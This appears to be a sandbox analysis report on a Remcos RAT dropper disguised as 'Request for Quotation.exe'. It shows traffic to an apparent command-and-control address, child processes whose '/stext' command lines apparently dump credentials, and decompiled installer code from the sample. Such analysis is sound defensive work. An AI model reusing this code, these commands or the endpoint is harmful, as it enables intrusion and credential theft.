                                                                              Feb 23, 2021 07:36:50.074436903 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:50.077605009 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:50.355793953 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:55.077516079 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:55.079380989 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:55.373529911 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:00.080703974 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:00.086631060 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:00.378096104 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:05.094703913 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:05.096642971 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:05.383399010 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:10.100707054 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:10.102817059 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:10.379391909 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:15.101253986 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:15.103574991 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:15.381124973 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:20.105051994 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:20.108186960 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:20.385838032 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:25.113567114 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:25.116960049 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:25.394527912 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:30.119721889 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:30.123833895 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:30.416162014 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:35.121937037 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:35.125305891 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:35.402942896 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:40.130445957 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:40.133066893 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:40.411088943 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:45.135632038 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:45.139297009 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:45.432147026 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:50.191212893 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:50.194943905 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:50.467767000 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:55.146903992 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:37:55.150768995 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:37:55.443649054 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:00.162065983 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:00.165205956 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:38:00.458777905 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:05.177947044 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:38:05.181857109 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:38:05.490008116 CET429949726103.89.88.238192.168.2.4

                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: Request for Quotation.exe PID: 7164 Parent PID: 5892

                                                                              General

                                                                              Start time:07:36:00
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: Request for Quotation.exe PID: 612 Parent PID: 7164

                                                                              General

                                                                              Start time:07:36:01
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: Request for Quotation.exe PID: 6188 Parent PID: 612

                                                                              General

                                                                              Start time:07:36:07
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: Request for Quotation.exe PID: 6424 Parent PID: 612

                                                                              General

                                                                              Start time:07:36:07
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: Request for Quotation.exe PID: 5692 Parent PID: 612

                                                                              General

                                                                              Start time:07:36:08
                                                                              Start date:23/02/2021
                                                                              Path:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'
                                                                              Imagebase:0x400000
                                                                              File size:246893 bytes
                                                                              MD5 hash:AE4BD6C5A7EAA50704D43D6054FC5DBD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >

                                                                                Analysis Process: Request for Quotation.exe PID: 7164 Parent PID: 5892 Request for Quotation.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\Request for Quotation.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\Request for Quotation.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                                0x00403496
                                                                                0x0040349a
                                                                                0x004034a2
                                                                                0x004034a6
                                                                                0x004034ab
                                                                                0x004034b7
                                                                                0x004034c0
                                                                                0x004034c5
                                                                                0x004034c8
                                                                                0x004034cf
                                                                                0x004034d6
                                                                                0x004034d6
                                                                                0x004034cf
                                                                                0x004034d8
                                                                                0x004034dd
                                                                                0x004034de
                                                                                0x004034ea
                                                                                0x004034ee
                                                                                0x004034f4
                                                                                0x00403502
                                                                                0x00403507
                                                                                0x0040350e
                                                                                0x00403512
                                                                                0x00403516
                                                                                0x00403518
                                                                                0x00403518
                                                                                0x00403516
                                                                                0x00403520
                                                                                0x00403527
                                                                                0x0040352d
                                                                                0x00403543
                                                                                0x00403553
                                                                                0x00403558
                                                                                0x0040355e
                                                                                0x00403565
                                                                                0x00403571
                                                                                0x0040357b
                                                                                0x0040357d
                                                                                0x0040357f
                                                                                0x00403584
                                                                                0x00403584
                                                                                0x00403594
                                                                                0x0040359a
                                                                                0x00403663
                                                                                0x00403663
                                                                                0x00403665
                                                                                0x00403667
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035a3
                                                                                0x004035a6
                                                                                0x004035ae
                                                                                0x004035ae
                                                                                0x004035b1
                                                                                0x004035b6
                                                                                0x004035b8
                                                                                0x004035b8
                                                                                0x004035b9
                                                                                0x004035b9
                                                                                0x004035be
                                                                                0x004035c1
                                                                                0x00403653
                                                                                0x00403658
                                                                                0x0040365d
                                                                                0x00403660
                                                                                0x00403662
                                                                                0x00403662
                                                                                0x00403662
                                                                                0x00000000
                                                                                0x004035c7
                                                                                0x004035c7
                                                                                0x004035c8
                                                                                0x004035cb
                                                                                0x004035e3
                                                                                0x0040360e
                                                                                0x00403610
                                                                                0x00403623
                                                                                0x0040364e
                                                                                0x00403651
                                                                                0x0040366f
                                                                                0x00403672
                                                                                0x0040367b
                                                                                0x00403680
                                                                                0x00403686
                                                                                0x00403691
                                                                                0x00403693
                                                                                0x00403698
                                                                                0x0040369a
                                                                                0x004036f2
                                                                                0x004036f7
                                                                                0x00403701
                                                                                0x00403708
                                                                                0x0040370c
                                                                                0x004037a0
                                                                                0x004037a0
                                                                                0x004037a5
                                                                                0x004037ab
                                                                                0x004037b0
                                                                                0x004038d4
                                                                                0x004038da
                                                                                0x00403956
                                                                                0x00403956
                                                                                0x0040395b
                                                                                0x0040395e
                                                                                0x00403960
                                                                                0x00403960
                                                                                0x00403968
                                                                                0x00403968
                                                                                0x004038ea
                                                                                0x004038f2
                                                                                0x004038f4
                                                                                0x004038f5
                                                                                0x00403902
                                                                                0x00403915
                                                                                0x0040391d
                                                                                0x00403921
                                                                                0x00403921
                                                                                0x00403929
                                                                                0x0040392e
                                                                                0x00403935
                                                                                0x00403943
                                                                                0x00403945
                                                                                0x0040394b
                                                                                0x0040394d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403937
                                                                                0x0040393d
                                                                                0x0040393f
                                                                                0x00403941
                                                                                0x0040394f
                                                                                0x00403951
                                                                                0x00000000
                                                                                0x00403951
                                                                                0x00000000
                                                                                0x00403941
                                                                                0x00403935
                                                                                0x004037bf
                                                                                0x004037c6
                                                                                0x004037c6
                                                                                0x00403718
                                                                                0x00403790
                                                                                0x00403790
                                                                                0x0040379c
                                                                                0x00000000
                                                                                0x0040379c
                                                                                0x00403721
                                                                                0x00403725
                                                                                0x0040375b
                                                                                0x0040375b
                                                                                0x0040375d
                                                                                0x00403765
                                                                                0x004037d7
                                                                                0x004037d9
                                                                                0x004037e0
                                                                                0x004037e8
                                                                                0x004037e8
                                                                                0x004037f3
                                                                                0x004037f8
                                                                                0x00403807
                                                                                0x0040380b
                                                                                0x0040380c
                                                                                0x00403815
                                                                                0x0040380e
                                                                                0x0040380e
                                                                                0x0040380e
                                                                                0x0040381b
                                                                                0x00403821
                                                                                0x00403827
                                                                                0x0040382f
                                                                                0x0040382f
                                                                                0x0040383d
                                                                                0x00403842
                                                                                0x00403854
                                                                                0x0040385c
                                                                                0x00403862
                                                                                0x0040386e
                                                                                0x00403874
                                                                                0x0040387e
                                                                                0x00403894
                                                                                0x004038a5
                                                                                0x004038ab
                                                                                0x004038b2
                                                                                0x004038b5
                                                                                0x004038bb
                                                                                0x004038bb
                                                                                0x004038b2
                                                                                0x004038bf
                                                                                0x004038c5
                                                                                0x004038c5
                                                                                0x004038ca
                                                                                0x004038ca
                                                                                0x00000000
                                                                                0x00403807
                                                                                0x00403767
                                                                                0x00403769
                                                                                0x00403774
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040377c
                                                                                0x00403787
                                                                                0x0040378c
                                                                                0x00000000
                                                                                0x0040378c
                                                                                0x00403750
                                                                                0x00403752
                                                                                0x00403756
                                                                                0x00403759
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403759
                                                                                0x00000000
                                                                                0x00403752
                                                                                0x004036a2
                                                                                0x004036ae
                                                                                0x004036b3
                                                                                0x004036b8
                                                                                0x004036ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004036c2
                                                                                0x004036ca
                                                                                0x004036db
                                                                                0x004036e3
                                                                                0x004036e5
                                                                                0x004036ea
                                                                                0x004036ec
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004036ec
                                                                                0x00000000
                                                                                0x00403651
                                                                                0x00403612
                                                                                0x00403615
                                                                                0x00403618
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x0040361e
                                                                                0x00000000
                                                                                0x0040361e
                                                                                0x0040361a
                                                                                0x0040361c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040361c
                                                                                0x004035cd
                                                                                0x004035d0
                                                                                0x004035d3
                                                                                0x004035d9
                                                                                0x004035d9
                                                                                0x00000000
                                                                                0x004035d9
                                                                                0x004035d5
                                                                                0x004035d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035a8
                                                                                0x004035a8
                                                                                0x004035a8
                                                                                0x004035a9
                                                                                0x004035a9
                                                                                0x00000000
                                                                                0x004035a8
                                                                                0x00000000

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                • GetVersion.KERNEL32 ref: 004034B1
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000020,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                  • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                  • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                  • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
                                                                                  • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                  • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                  • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                                  • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                                  • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                  • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                • ExitProcess.KERNEL32 ref: 004037C6
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                • ExitProcess.KERNEL32 ref: 00403968
                                                                                  • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
